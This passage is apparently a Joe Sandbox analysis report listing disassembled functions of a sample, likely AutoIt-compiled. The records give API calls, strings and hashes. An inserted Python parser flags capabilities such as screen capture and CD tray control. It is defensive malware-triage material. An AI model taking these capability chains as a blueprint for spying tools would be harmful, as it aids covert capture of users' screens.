                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                Strings
                                                Similarity
                                                • API ID: Window$CreateDestroy
                                                • String ID: ,$tooltips_class32
                                                • API String ID: 1109047481-3856767331
                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                Strings
                                                Similarity
                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                • String ID: 0
                                                • API String ID: 1441871840-4108050209
                                                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                Strings
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 3631882475-2268648507
                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                • SendMessageW.USER32 ref: 00471740
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                • SendMessageW.USER32 ref: 0047184F
                                                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                Similarity
                                                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 4116747274-0
                                                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                • _wcslen.LIBCMT ref: 00461683
                                                • __swprintf.LIBCMT ref: 00461721
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                • GetParent.USER32(?), ref: 004618C3
                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                Strings
                                                Similarity
                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                • String ID: %s%u
                                                • API String ID: 1899580136-679674701
                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                Strings
                                                Similarity
                                                • API ID: InfoItemMenu$Sleep
                                                • String ID: 0
                                                • API String ID: 1196289194-4108050209
                                                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0043143E
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                Strings
                                                Similarity
                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                • String ID: (
                                                • API String ID: 3300687185-3887548279
                                                • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Similarity
                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 1976180769-4113822522
                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
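Added example (editor's code, not part of the Joe Sandbox report or its IDA plugin): a small parser for the function records in this listing that extracts each record's direct API calls, subcall attributions, reference addresses and String ID values, then flags capabilities from API combinations. The two records it is fed are copied from this page: the GDI chain above (GetDC(NULL), CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits is the standard desktop screenshot sequence) and the mciSendStringW record with the "set cd door" strings (CD tray control). The capability rules, the record keys and the sample text are the editor's assumptions, not Joe Sandbox signatures. One caveat for anyone triaging from this listing: the MessageBoxW record above carries the AutoIt interpreter's script-error strings ("Line %d (File \"%s\"):", "^ ERROR"), so most of these API chains are interpreter built-ins present in every AutoIt-compiled binary, and a capability hit here says what the runtime can do, not necessarily what the embedded script does.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag capabilities.

Editor's example, not Joe Sandbox code. Input is the plain-text record layout
used on this page: an "APIs" block of "• Name.MODULE(args), ref: ADDR" lines
(optionally prefixed "Part of subcall function XXXXXXXX:"), a "Strings" block,
and a "Similarity" block whose "String ID" line joins string refs with '$'.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API reference line. Args are optional (e.g. "GetFocus.USER32 ref: ...").
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)

# Assumed capability rules (editor's, not Joe Sandbox signatures):
# "apis" must all be present, at least one of "any", and each "strings"
# substring must occur in some String ID value of the record.
CAPABILITIES = {
    "screen_capture": {
        "apis": {"GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC", "GetDIBits"},
        "any": {"BitBlt", "StretchBlt"},
    },
    "cd_tray_control": {"apis": {"mciSendStringW"}, "strings": ("set cd door",)},
    "popup_menu": {"apis": {"TrackPopupMenuEx", "SetForegroundWindow"}},
}


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: int
    via_subcall: Optional[str] = None  # callee address when attributed to a subcall


@dataclass
class Record:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: Optional[str] = None

    def api_names(self):
        # Subcall APIs belong to the callee, so only direct calls count here.
        return {c.name for c in self.calls if c.via_subcall is None}


def parse_records(text):
    """Split the listing into records; a record starts at each 'APIs' heading."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(Call(m["name"], m["module"], args, int(m["ref"], 16), m["sub"]))
        elif line.startswith("• String ID:"):
            val = line[len("• String ID:"):].strip()
            cur.strings = val.split("$") if val else []
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
    return records


def match_capabilities(rec):
    names = rec.api_names()
    hits = []
    for cap, rule in CAPABILITIES.items():
        if not rule.get("apis", set()) <= names:
            continue
        if rule.get("any") and not (rule["any"] & names):
            continue
        needles = rule.get("strings", ())
        if needles and not all(any(n in s for s in rec.strings) for n in needles):
            continue
        hits.append(cap)
    return hits


def triage(text):
    """Return {record key: {apis, subcalls, capabilities}} for each record."""
    result = {}
    for rec in parse_records(text):
        if rec.opcode_id:
            key = rec.opcode_id[:16]
        elif rec.calls:
            key = f"{rec.calls[0].ref:08X}"
        else:
            continue
        result[key] = {
            "apis": sorted(rec.api_names()),
            "subcalls": sorted({c.via_subcall for c in rec.calls if c.via_subcall}),
            "capabilities": match_capabilities(rec),
        }
    return result


# Constructed sample: two records copied from this page, Opcode IDs shortened.
SAMPLE = """\
APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
Strings
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• Opcode ID: 7cf8b5f0
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
Strings
Similarity
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• Opcode ID: a85f7e6f
"""

if __name__ == "__main__":
    for key, info in triage(SAMPLE).items():
        print(key, info["capabilities"], info["apis"])
```

Feed it the whole listing (copied as text) and sort by capability to get a quick map of which functions implement screenshot capture, clipboard access, menu hooking and so on; the ref addresses then take you straight to the right function in the dump for manual review.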
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                • String ID:
                                                • API String ID: 461458858-0
                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3969911579-0
                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                • String ID: 0
                                                • API String ID: 956284711-4108050209
                                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 1965227024-3771769585
                                                • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove_wcslen
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 369157077-1007645807
                                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                APIs
                                                • GetParent.USER32 ref: 00445BF8
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 3125838495-3381328864
                                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                APIs
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$CharNext
                                                • String ID:
                                                • API String ID: 1350042424-0
                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
